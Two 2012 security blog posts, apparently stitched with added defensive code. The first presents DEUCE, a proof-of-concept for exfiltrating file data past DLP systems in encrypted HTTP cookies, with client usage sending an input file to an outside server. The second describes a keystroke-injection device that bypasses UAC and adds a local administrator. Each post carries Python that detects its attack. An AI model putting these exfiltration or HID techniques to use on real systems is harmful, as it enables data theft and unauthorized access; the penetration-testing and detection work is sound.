Wednesday, July 18, 2012

DEUCE: Bypassing DLP with Cookies

At a recent B-Sides event there was a talk about data exfiltration and Data Loss Prevention (DLP) systems. A known vector for bypassing DLP is the use of NSLookup: the attacker requests a domain he controls but prepends a hostname that contains the data that needs to be sent outside the controlled environment. This means that if an attacker wanted to steal a name and social security number, he would request “” This request would hit the DNS server and be logged, creating a list of identities for the attacker to mine at a later time. The maximum limit for this kind of attack is 255 characters. This concept got me thinking: a standard GET request such as this would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see which pages were requested. We would still be limited by the character maximum, and each request could easily be logged and analyzed by proxies or alerting systems. But let’s be honest, most DLP systems are going to alert on these types of requests, or at least they should.

After some discussion with friends, it was pointed out that cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems, and if the cookie is encoded or encrypted, as they normally are, it keeps the DLP and prying eyes at bay. As an added benefit we are no longer limited by the 255 character maximum, and one request can send many cookies.

This led to the need for a tool to test the concept. Enter Data Exfiltration Using Cookie Encryption, or DEUCE. DEUCE went from a simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line. DEUCE can encrypt with AES, hash with MD5, or use a custom multi-encode with a replacement cipher applied 3 times. The client then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. MD5 is a one-way hash that would need to be cracked; however, if an attacker sent a list of social security numbers it would only take minutes to crack the 9-digit numbers using a tool like Hashcat. In the Python code you can change the name of the cookie; just make sure you change it in both the client and the server.

DEUCE is written in Python but could easily be converted to an executable using py2exe or PyInstaller; the AES encryption relies on PyCrypto. Because this is just a proof-of-concept tool, DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces on port 80. The DEUCE client has more options, such as the encryption or encoding method, target URL and input file. Example usage below:

  • python -o output.txt
    • This starts the listening server on all interfaces on port 80, with the output written to output.txt
  • python -u http://location_of_deuce_server -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server; the -m flag tells DEUCE to use multi-encode mode.
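On the detection side, the properties that make cookies attractive here (many cookies per request, long opaque values) are also what stands out in a request log. The following Python is an added example, not part of DEUCE, and assumes the proxy or DLP gateway is configured to log the Cookie header (which, as noted above, most are not by default); the records, thresholds and host names are constructed for illustration.

```python
import base64
import hashlib
import math
from collections import Counter

# Constructed proxy-style records of (host, Cookie header): sample input for
# this example, not output of DEUCE. The last record mimics a DEUCE-style
# request, one cookie per input line with opaque encrypted/encoded values
# (stand-in base64 SHA-256 digests, since real ciphertext is not on the page).
SAMPLE_REQUESTS = [
    ("www.example.com", "session=abc123; lang=en"),
    ("cdn.example.org", "_ga=GA1.2.1234567890.1342000000; theme=dark"),
    ("location_of_deuce_server", "; ".join(
        "deuce%d=%s" % (i, base64.b64encode(
            hashlib.sha256(b"line%d" % i).digest()).decode())
        for i in range(12))),
]

def shannon_entropy(value: str) -> float:
    """Bits per character; base64/ciphertext sits near 5-6, plain text lower."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())

def cookie_stats(cookie_header: str) -> dict:
    """Count, total size and the longest/highest-entropy value of one header."""
    values = [p.split("=", 1)[1].strip()
              for p in cookie_header.split(";") if "=" in p]
    return {
        "count": len(values),
        "bytes": len(cookie_header),
        "max_entropy": max((shannon_entropy(v) for v in values), default=0.0),
        "max_len": max((len(v) for v in values), default=0),
    }

def is_suspicious(cookie_header: str, max_cookies: int = 8,
                  max_bytes: int = 1024, min_entropy: float = 4.5) -> bool:
    """Heuristic for DEUCE-like cookie exfiltration: an unusual number of
    cookies in one request, an oversized header, or a long high-entropy value.
    The thresholds are assumptions; tune them against a per-site baseline."""
    s = cookie_stats(cookie_header)
    return (s["count"] > max_cookies or s["bytes"] > max_bytes
            or (s["max_len"] >= 32 and s["max_entropy"] >= min_entropy))

def flag_requests(records) -> list:
    """Return the hosts whose Cookie header trips the heuristic."""
    return [host for host, cookie in records if is_suspicious(cookie)]
```

Run over the constructed records, only the DEUCE-style request is flagged; legitimate analytics cookies stay below the length and entropy limits.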

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.

Saturday, July 7, 2012

How to add a local administrator with the Arduino Leonardo.

For a while now security researchers have been using the Teensy for HID attacks, which really is the way to go if that’s all you want to do. However, if you are like me and want to do other things as well, you need something bigger. Enter the Arduino Leonardo: this Arduino board supports emulating a HID (Human Interface Device) out of the box. It’s not as tiny as the Teensy, but at only 2.7” x 2.1” it is still small. It would be very easy to leave the Leonardo in a backpack and just run the USB cable to the victim device, especially since the whole attack takes about 5 seconds.

When programming the Leonardo to emulate a HID, I really recommend using a button in conjunction with the device (see image below). This way, if you make a mistake, you can upload a new sketch. It would be very difficult to reprogram it if it kept typing the add-user commands over and over again.


Here is the attack in action via screen recording.

In the first part of the video I show which users are on the system. Then the device is plugged in and the attack launches. The Leonardo starts emulating a keyboard by pressing the Windows key and then types cmd.exe. Next it uses the keyboard shortcut for run as admin (ctrl+shift). Then the Leonardo hits tab 3 times to select OK on the UAC prompt and hits enter. Finally, an administrator command prompt is open and the Leonardo types out the commands to add a user, adds that user to the local Administrators group and closes the prompt. The nice part is that since you write the program there are no typing errors, and it types about a hundred times faster than you do.
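The speed that makes this attack attractive is also a detection handle: an account is created and made a local administrator within a few seconds of each other, faster than an administrator would type both commands and click through UAC. The following Python is an added example on the defender's side, not the sketch from this post; it assumes simplified event records (dicts with the fields shown) rather than real event-log XML, and uses the standard Windows Security event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group).

```python
from datetime import datetime

# Constructed, simplified Windows Security log records (not from the page or
# the video). 4720 = "A user account was created", 4732 = "A member was added
# to a security-enabled local group"; the accounts and times are made up.
EVENTS = [
    {"time": "2012-07-07T09:55:00", "id": 4720, "account": "helpdesk01",
     "by": "ITADMIN"},
    {"time": "2012-07-07T09:59:30", "id": 4732, "account": "helpdesk01",
     "group": "Administrators", "by": "ITADMIN"},
    # Two seconds apart, as a keystroke-injecting device would produce.
    {"time": "2012-07-07T10:12:03", "id": 4720, "account": "svc_backup",
     "by": "ALICE"},
    {"time": "2012-07-07T10:12:05", "id": 4732, "account": "svc_backup",
     "group": "Administrators", "by": "ALICE"},
    {"time": "2012-07-07T10:30:00", "id": 4732, "account": "bob",
     "group": "Remote Desktop Users", "by": "ITADMIN"},
]

def find_scripted_admin_adds(events, window_seconds=10.0):
    """Pair each local-account creation (4720) with a later addition of the
    same account to Administrators (4732) and report pairs closer together
    than window_seconds. The window is an assumption: a pre-programmed HID
    device finishes in seconds, a human usually does not.
    Returns (account, seconds_between, subject) tuples."""
    created = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO 8601 sorts as text
        stamp = datetime.fromisoformat(ev["time"])
        name = ev["account"].lower()
        if ev["id"] == 4720:
            created[name] = stamp
        elif ev["id"] == 4732 and ev.get("group") == "Administrators":
            if name in created:
                delta = (stamp - created[name]).total_seconds()
                if delta <= window_seconds:
                    findings.append((ev["account"], delta, ev["by"]))
    return findings

if __name__ == "__main__":
    for account, secs, who in find_scripted_admin_adds(EVENTS):
        print("%s created and made admin %.0fs apart by %s" % (account, secs, who))
```

The helpdesk01 pair (several minutes apart) and the Remote Desktop Users change are not reported; only the two-second svc_backup sequence is.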

The following code is for use with a button. However, feel free to remove that part if you wish.

Thanks to @irongeek_adc for pointing out the Leonardo and answering my questions and to @matthewneely, @SoapyWetDish and @dave_rel1k for other guidance.